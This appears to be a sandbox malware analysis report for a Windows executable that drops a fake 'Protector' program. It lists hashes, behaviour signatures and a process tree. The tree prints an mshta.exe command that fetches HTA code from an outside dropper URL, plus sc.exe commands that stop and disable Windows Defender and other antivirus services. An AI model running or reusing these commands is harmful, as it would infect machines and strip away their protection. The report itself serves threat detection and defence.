Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/08/2024, 19:07

General

  • Target

    70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe

  • Size

    2.1MB

  • MD5

    ac2bf4a9c78fa484d14d45ebb20bb63d

  • SHA1

    0f2164ff2bfd617e2d37e847541a1ed7aacafe94

  • SHA256

    70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2

  • SHA512

    6a8191e115e8b99424cdaa0ade7b148c14782dfbea981692a106e6b66ae1dae474bae37571b542ae5992d263851f292f7731f3449750c6bbd2bde260671323bd

  • SSDEEP

    49152:DIqjmpWdn49S5w+z4BYAiaxs6v5fZ3RyGw0cobvZxC7yciIB:DBmpWdn4ww+z4mu5fNAGw0ZVEyciIB

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1

Signatures

  • Disables service(s) 3 TTPs
  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
    "C:\Users\Admin\AppData\Local\Temp\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1456
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe" -e -p4dd2wgad9575xn4
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:724
        • C:\Users\Admin\AppData\Roaming\Protector-vrhp.exe
          C:\Users\Admin\AppData\Roaming\Protector-vrhp.exe
          4⤵
          • UAC bypass
          • Event Triggered Execution: Image File Execution Options Injection
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:5004
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:220
          • C:\Windows\SysWOW64\sc.exe
            sc stop WinDefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4864
          • C:\Windows\SysWOW64\sc.exe
            sc config WinDefend start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1852
          • C:\Windows\SysWOW64\sc.exe
            sc stop msmpsvc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:756
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1868
          • C:\Windows\SysWOW64\sc.exe
            sc config ekrn start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2256
          • C:\Windows\SysWOW64\sc.exe
            sc stop AntiVirService
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3188
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirService start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1608
          • C:\Windows\SysWOW64\sc.exe
            sc config AntiVirSchedulerService start= disabled
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:2112
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\CN86J8~1.EXE" >> NUL
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1192

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe

    Filesize

    2.0MB

    MD5

    d2d1c9c8bb295f187be0cda58d303bbb

    SHA1

    90963d63b1068613053acb0f1f2a7ea8ae4bee83

    SHA256

    af6d0ae360a122ff23b5b3e8ef36176b3697eb0710852ff075e3014b360d8733

    SHA512

    835693f8414f90a232b0b585a9748ddaa450f76c0b25e98cea44799a2413fc69519e4bf6fb08d090056e6df86c4c107971a8dae8f996d2e9373131c235b6d307

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe

    Filesize

    1.9MB

    MD5

    ca5c540f357be8a95512d23fed022883

    SHA1

    0122533984c6b90856f1b39c6e5332c0a80e18f0

    SHA256

    6dc40b6231fef0ddd7533646f3b3a592f6258998a010b519efbf3892d95ba476

    SHA512

    5129db04faecd4459cc771ec5353e1dd9f5bf584ed190d3178898446644efac93688f6fa1e20690d1208b1494c57af9ec315a78d43fef4d576eb4de3bad4d9b0

  • memory/724-25-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/724-18-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-67-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-35-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-36-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-66-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-23-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-68-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-69-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-70-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-72-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-73-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-74-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-76-0x0000000000400000-0x0000000000826000-memory.dmp

    Filesize

    4.1MB